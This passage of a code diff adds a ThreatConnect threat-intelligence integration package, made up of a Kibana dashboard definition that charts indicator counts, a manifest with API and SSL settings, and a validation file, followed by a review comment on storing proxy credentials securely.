"indexpattern-datasource-layer-f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a": { + "columnOrder": [ + "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8", + "c29f1f0c-75a1-43df-a242-5aebf0d99f06" + ], + "columns": { + "c29f1f0c-75a1-43df-a242-5aebf0d99f06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "c29f1f0c-75a1-43df-a242-5aebf0d99f06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c29f1f0c-75a1-43df-a242-5aebf0d99f06" + ], + "layerId": "f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + 
"type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676", + "w": 24, + "x": 24, + "y": 27 + }, + "panelIndex": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676", + "title": "Indicator by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dcd07ab5-5229-4f16-bee4-af9aff1817a9": { + "columnOrder": [ + "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb", + "890482c1-0951-464b-aa0d-24e845e32e2d" + ], + "columns": { + "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "890482c1-0951-464b-aa0d-24e845e32e2d", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.ip" + }, + "890482c1-0951-464b-aa0d-24e845e32e2d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": 
"890482c1-0951-464b-aa0d-24e845e32e2d", + "isTransposed": false + }, + { + "columnId": "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb", + "isTransposed": false + } + ], + "layerId": "dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9", + "w": 24, + "x": 0, + "y": 42 + }, + "panelIndex": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9", + "title": "Top 10 IP Addresses [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f601aefb-f565-4983-beff-a2cafafff86d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f601aefb-f565-4983-beff-a2cafafff86d": { + "columnOrder": [ + "8ed20c0c-2a3c-4d21-96f2-898be1b96920", + "7bb86456-e978-47b9-af5e-91996719c084" + ], + "columns": { + "7bb86456-e978-47b9-af5e-91996719c084": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "8ed20c0c-2a3c-4d21-96f2-898be1b96920": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Confidence", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "7bb86456-e978-47b9-af5e-91996719c084", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.confidence" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": 
{}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7bb86456-e978-47b9-af5e-91996719c084" + ], + "layerId": "f601aefb-f565-4983-beff-a2cafafff86d", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "8ed20c0c-2a3c-4d21-96f2-898be1b96920" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "cd65eda6-09a2-4264-9288-0845dd8db3cf", + "w": 24, + "x": 24, + "y": 42 + }, + "panelIndex": "cd65eda6-09a2-4264-9288-0845dd8db3cf", + "title": "Indicator by Confidence [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b9ea7b8e-ee36-4720-b936-c34cead4e4ed": { + "columnOrder": [ + "08573390-8963-42f9-9028-537f075a50f6", + "87278fc6-293b-4844-9ab2-01345a3cbaff" + ], + "columns": { + "08573390-8963-42f9-9028-537f075a50f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": 
"Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "87278fc6-293b-4844-9ab2-01345a3cbaff", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "observer.hostname" + }, + "87278fc6-293b-4844-9ab2-01345a3cbaff": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "08573390-8963-42f9-9028-537f075a50f6", + "isTransposed": false + }, + { + "columnId": "87278fc6-293b-4844-9ab2-01345a3cbaff", + "isTransposed": false + } + ], + "layerId": "b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e0f08aa6-381d-43dc-87f4-7aed2b711531", + "w": 24, + "x": 0, + "y": 57 + }, + "panelIndex": "e0f08aa6-381d-43dc-87f4-7aed2b711531", + "title": "Top 10 Host Details [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-81d7992b-9bf9-49b8-be57-190a1295b2c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81d7992b-9bf9-49b8-be57-190a1295b2c9": { 
+ "columnOrder": [ + "24ae2748-3a92-4338-b07c-97edf6846f26", + "b9865834-c554-4fd3-aeba-417c3f4e66c7" + ], + "columns": { + "24ae2748-3a92-4338-b07c-97edf6846f26": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b9865834-c554-4fd3-aeba-417c3f4e66c7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.attributes.data.type" + }, + "b9865834-c554-4fd3-aeba-417c3f4e66c7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.attributes.data.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b9865834-c554-4fd3-aeba-417c3f4e66c7" + ], + "layerId": "81d7992b-9bf9-49b8-be57-190a1295b2c9", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "24ae2748-3a92-4338-b07c-97edf6846f26" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + 
"yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc", + "w": 24, + "x": 24, + "y": 57 + }, + "panelIndex": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc", + "title": "Indicator Attributes by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d69a36b3-ced4-4265-90c0-89a707c1004e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d69a36b3-ced4-4265-90c0-89a707c1004e": { + "columnOrder": [ + "c2549442-c685-4722-867a-f5ba2053db92", + "d4d22514-6ee4-4752-a6da-835ea9121f00" + ], + "columns": { + "c2549442-c685-4722-867a-f5ba2053db92": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d4d22514-6ee4-4752-a6da-835ea9121f00": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d4d22514-6ee4-4752-a6da-835ea9121f00" + ], + "layerId": "d69a36b3-ced4-4265-90c0-89a707c1004e", + "layerType": "data", + "position": "top", + "seriesType": "line", + 
"showGridlines": false, + "xAccessor": "c2549442-c685-4722-867a-f5ba2053db92" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "bf742114-3ce0-498e-8855-5b7759095d38", + "w": 24, + "x": 0, + "y": 72 + }, + "panelIndex": "bf742114-3ce0-498e-8855-5b7759095d38", + "title": " Indicator Over Time [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "80cbd0fd-3ebe-4209-bd05-7bf30720ceea": { + "columnOrder": [ + "fbe0e23b-d178-4dcd-a357-a6c58b5bb857", + "1f57c455-830f-41f5-8e26-af95378033a8" + ], + "columns": { + "1f57c455-830f-41f5-8e26-af95378033a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "fbe0e23b-d178-4dcd-a357-a6c58b5bb857": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URL", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1f57c455-830f-41f5-8e26-af95378033a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.original" + } 
+ }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "fbe0e23b-d178-4dcd-a357-a6c58b5bb857" + }, + { + "columnId": "1f57c455-830f-41f5-8e26-af95378033a8", + "isTransposed": false + } + ], + "layerId": "80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0d812096-c012-4399-a9bb-3ad7b43a3c30", + "w": 24, + "x": 24, + "y": 72 + }, + "panelIndex": "0d812096-c012-4399-a9bb-3ad7b43a3c30", + "title": "Top 10 Accessed URLs [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2061406-e25c-4076-b762-bb84c804c536", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2061406-e25c-4076-b762-bb84c804c536": { + "columnOrder": [ + "111ef2da-8ce5-4c14-9efb-4014c12900f6", + "f381bc58-ce2a-41ed-a700-2c817bce9c40" + ], + "columns": { + "111ef2da-8ce5-4c14-9efb-4014c12900f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Owner Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f381bc58-ce2a-41ed-a700-2c817bce9c40", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.owner.name" + }, + 
"f381bc58-ce2a-41ed-a700-2c817bce9c40": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "111ef2da-8ce5-4c14-9efb-4014c12900f6", + "isTransposed": false + }, + { + "columnId": "f381bc58-ce2a-41ed-a700-2c817bce9c40", + "isTransposed": false + } + ], + "layerId": "f2061406-e25c-4076-b762-bb84c804c536", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e7f72491-f16b-413b-989e-8a0160c267a0", + "w": 24, + "x": 24, + "y": 87 + }, + "panelIndex": "e7f72491-f16b-413b-989e-8a0160c267a0", + "title": "Top 10 Owner Associated with Indicator [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e5a82fdf-33c0-4d88-83d7-4367b95c1e08": { + "columnOrder": [ + "acd59967-a926-452d-b83a-4bf6085a41d1", + "14e5af4d-d4f0-4522-b162-bb4e9f3770d7" + ], + "columns": { + "14e5af4d-d4f0-4522-b162-bb4e9f3770d7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + 
"acd59967-a926-452d-b83a-4bf6085a41d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Associated Group Names", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "14e5af4d-d4f0-4522-b162-bb4e9f3770d7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "acd59967-a926-452d-b83a-4bf6085a41d1", + "isTransposed": false + }, + { + "columnId": "14e5af4d-d4f0-4522-b162-bb4e9f3770d7", + "isTransposed": false + } + ], + "layerId": "e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b93c2896-87e5-4cfe-8954-0bae5a0815be", + "w": 24, + "x": 0, + "y": 87 + }, + "panelIndex": "b93c2896-87e5-4cfe-8954-0bae5a0815be", + "title": "Top 10 Associated Groups [Logs ThreatConnect]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs ThreatConnect] Indicator", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-12T06:46:34.698Z", + "id": "ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"3ddaf7b4-453d-488c-a2ed-76a6cd318230:indexpattern-datasource-layer-89f5dc3a-f57a-474d-be03-49659399fcbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77:indexpattern-datasource-layer-c3124540-fb37-497c-8e54-fe6206e27a29", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "da4952b2-7a0a-47e6-8307-91fbeff1cd49:indexpattern-datasource-layer-421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561f36d9-8bd8-4438-8670-292221db6ec3:indexpattern-datasource-layer-216e8a8a-32b9-4fa8-857c-340f946e3d84", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b:indexpattern-datasource-layer-961eaa59-f6c0-488d-a59d-4212ada370ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676:indexpattern-datasource-layer-f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9:indexpattern-datasource-layer-dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cd65eda6-09a2-4264-9288-0845dd8db3cf:indexpattern-datasource-layer-f601aefb-f565-4983-beff-a2cafafff86d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0f08aa6-381d-43dc-87f4-7aed2b711531:indexpattern-datasource-layer-b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc:indexpattern-datasource-layer-81d7992b-9bf9-49b8-be57-190a1295b2c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bf742114-3ce0-498e-8855-5b7759095d38:indexpattern-datasource-layer-d69a36b3-ced4-4265-90c0-89a707c1004e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0d812096-c012-4399-a9bb-3ad7b43a3c30:indexpattern-datasource-layer-80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "type": 
"index-pattern" + }, + { + "id": "logs-*", + "name": "e7f72491-f16b-413b-989e-8a0160c267a0:indexpattern-datasource-layer-f2061406-e25c-4076-b762-bb84c804c536", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b93c2896-87e5-4cfe-8954-0bae5a0815be:indexpattern-datasource-layer-e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_threatconnect/manifest.yml b/packages/ti_threatconnect/manifest.yml new file mode 100644 index 00000000000..35e4d9d80fe --- /dev/null +++ b/packages/ti_threatconnect/manifest.yml 
@@ -0,0 +1,94 @@ +format_version: 3.0.3 +name: ti_threatconnect +title: ThreatConnect +version: 0.3.0 +description: Collect logs from ThreatConnect with Elastic Agent. +type: integration +categories: + - security + - threat_intel +conditions: + kibana: + version: ^8.12.0 + elastic: + subscription: basic +screenshots: + - src: /img/threat-connect-indicator-dashboard.png + title: Sample screenshot + size: 600x600 + type: image/png +icons: + - src: /img/threat-connect-logo.svg + title: Sample logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: threatconnect + title: ThreatConnect logs + description: Collect ThreatConnect logs. + inputs: + - type: cel + title: Collect ThreatConnect logs via API + description: Collecting ThreatConnect logs via API. + vars: + - name: url + type: text + title: URL + description: "Base URL of the ThreatConnect API. Default URL given is for the ThreatConnect's Public Cloud instance. Note: Do not include trailing slash “/” character." + default: https://app.threatconnect.com + required: true + show_user: true + - name: access_id + type: text + title: Access ID + description: Access ID of a ThreatConnect API User. + multi: false + required: true + show_user: true + - name: secret_key + type: password + title: Secret Key + description: Secret Key of a ThreatConnect API User. + multi: false + required: true + show_user: true + secret: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. 
+ multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- +owner: + github: elastic/security-service-integrations + type: elastic diff --git a/packages/ti_threatconnect/validation.yml b/packages/ti_threatconnect/validation.yml new file mode 100644 index 00000000000..fe6ea6d0d99 --- /dev/null +++ b/packages/ti_threatconnect/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00002 # Saved query, but no filter. diff --git a/packages/ti_threatq/changelog.yml b/packages/ti_threatq/changelog.yml index 6f6f57ab2cf..1237f980a8c 100644 --- a/packages/ti_threatq/changelog.yml +++ b/packages/ti_threatq/changelog.yml 
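Review bot: `proxy_url` is declared `type: text` with no `secret: true`, yet its description instructs the user to embed a URL-encoded username and password in it, so any proxy credential ends up stored and displayed as plain policy text while `secret_key` a few lines above gets `type: password` and `secret: true`. Consider `type: password` plus `secret: true` on `proxy_url` as well, or state in its description that an authenticating proxy should not be configured through this field. Leaving `access_id` as plain text looks consistent with it being an identifier rather than a credential.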
